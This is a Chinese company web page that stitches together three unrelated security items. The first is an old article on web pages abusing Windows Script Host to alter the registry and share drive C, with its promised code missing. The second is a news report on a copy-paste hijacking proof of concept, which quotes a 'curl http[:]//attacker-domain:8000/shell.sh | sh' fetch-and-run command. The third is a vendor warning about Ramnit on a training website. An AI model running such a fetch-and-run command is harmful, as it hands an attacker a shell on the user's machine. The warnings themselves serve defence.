整合营销服务商
电脑端+手机端+微信端=数据同步管理
免费咨询热线:
电脑端+手机端+微信端=数据同步管理
免费咨询热线:
Windows Scripting Host Object Reference--罪魁祸首?
Windows Scripting Host Object Reference,以下简称Wsh.在windows 9x的默认安装时都有的,我发现绝大多数上网用户都没有卸载它。
我从来没想到利用Wsh结合javascript能写出如此厉害的网页病毒来。先说说我写这文章的来由:
我的一个朋友在访问重庆吻网(www.cqkiss.com)后,他以后每次启动机器在登陆对话框出现之前都会出现欢迎光临重庆吻网(www.cqkiss.com)的字样,由于平时对注册表的东西留意得比较多,我知道肯定是在注册表里改了什么设置。
由网页可以直接操纵注册表?我感到疑惑,但经过我的研究发现,事实上确实可以。通过我的研究发现,Wsh的功能非常吓人,我们可以写出特定的页面,你在访问它之后可能出现如下后果:
1、删除你硬盘上的指定文件,创建和修改文本文件,autoexec.bat是文本文件吧。我作了试验,确实可以修改它。
2、执行操作系统允许的任意程序;
3、把你的C盘设置为完全共享,然后别人可以在你的机器上安置木马。我在所举出的网页例子中,就实现了设置C盘为隐含的完全共享的功能。由于你的网站只涉及到注册表的操作,因此我在所举出的例子中就只包含了这一部分。别的如1和2所述的功能实现就不给出。
MSDN上关于wsh对注册表的操作说明:
The following table describes the methods associated with the WshShell object.
Method Description RegDelete --->Deletes a specified key or value from the registry.
RegRead --> Returns a specified key or value from the registry.
RegWrite --> Sets a specified key or value in the registry.
更详细的说明请自己参照MSDN上的说明
在下面的网页代码例子中,我只尝试了RegWrite和RegDelete两种方法的使用。
网页代码的例子:
(注:/*...*/内的文字是我的说明,在实际的网页代码中应去掉。当然它的功能实现需要wsh的支持)
/*index.htm文件内容如下:*/
/*这一行好象必须要,意思不太明了*/
为你作了一件好事--你现在可以使用Regedit.exe了。
同时作了一件更大的坏事--把你的C盘完全共享了,请参照源代码消除它好了。
如果你在上网前关掉了Windows script host,那么这个网页代码不会起作用。呵呵........
由此看来,上网真是一件很危险的事情?所以,我在上网前就先把那个Wsh给卸载掉了,就是在控制面板里选择“添加/删除程序”,再选择"windows安装程序"里的附件,再选择“详细资料”中的Windows Scripting Host,把它卸载掉就不用担心它来害你了,不过你作的网页上也不允许害别人哟。
你如果嫌麻烦就直接把c:\windows目录底下的一个叫Wshom.ocx的文件改名好了,我就是把它改为Wshom.ocx.old的。
弈安传媒科技微课堂,每天分享财经资讯,计算机技术知识,人生感悟,创业指导以及各种专业技术知识资料学习交流.移动学习平台、知识分享平台。随时随地的学习,如果你喜欢成长,这里你不容错过的地方.弈安传媒科技培训关注:关注自己成长,分享内容,分享自己的技术,成就未来.
[弈安传媒科技提升自己的平台]请关注:头条号及公众号 弈安传媒科技
全研究人员警告,HTML页面上的命令列可能藏匿恶意程序码,开发者稍有不察直接复制贴上终端时,可能就让黑客得以于程序中植入后门。
复制粘贴要当心,病毒代码在执行
一名安全研究人员Gabriel Friedlander近日警告,随手从网络上复制与贴上(Copy/Paste)命令列时要特别小心,因为黑客可能趁此骇进开发者的系统或应用程序。
Friedlander打造了一个概念性验证攻击手法,他设计一个假装可用来更新Ubuntu作业系统的命令列,该命令列显示的文字很简单,为「sudo apt update」,但当开发者复制它,并将它贴上记事本或终端时,它出现的却是「curl http[:]//attacker-domain:8000/shell.sh | sh 」,若是直接贴入终端,它将立即执行。
这是因为Friedlander在此一HTML页面上藏匿了JavaScript程序码,而让开发者眼见的文字与贴上之后所呈现的内容完全不同。
Friedlander说,不管是新手或是熟练的开发者,都可能会从网络上复制命令列或部份程序码,但这是非常危险的行为,也许会让黑客直接于程序中植入后门,相关的攻击非常地简单,却可能带来极大的伤害,建议开发者应永远避免于终端贴上直接自网络上复制的命令列。
0月9日,火绒团队发出安全警告,火绒工程师通过“火绒威胁情报系统”发现,尚德机构部分省份(91ld.com域名)的在职研究生培训报名服务中心页面携带感染型病毒“Ramnit”。经分析,该病毒或是通过“供应链污染”的方式进行传播,即网站开发者开发环境被病毒感染,导致制作的网页携带病毒。但该病毒仅会感染未开启浏览器安全选项且版本较低的操作系统,因此普通用户不必过于担心。
如果病毒成功入侵电脑后,会感染电脑中的所有可执行文件和HTML文件,窃取用户上网信息(譬如浏览器cookies等),并且通过这些被感染文件进行重复传播。建议近期登录过上述相关网站的用户,及时下载“火绒安全软件”进行查杀。火绒产品无需升级,即可查杀该病毒。
目前,“供应链污染”正在成为网络平台上病毒传播的一大主要方式,火绒也曾多次发布过相关报道。火绒工程师建议尚德机构尽快排查上述问题,避免出现病毒通过平台进行传播的可能性。另外,此次事件折射出的平台数据安全监管问题,应当引起广大管理人员、开发人员的警惕 ,需要实时加强安全审查力度,必要时通过安装合格的安全软件进行自查,阻止病毒传播。
*请认真填写需求信息,我们会在24小时内与您取得联系。
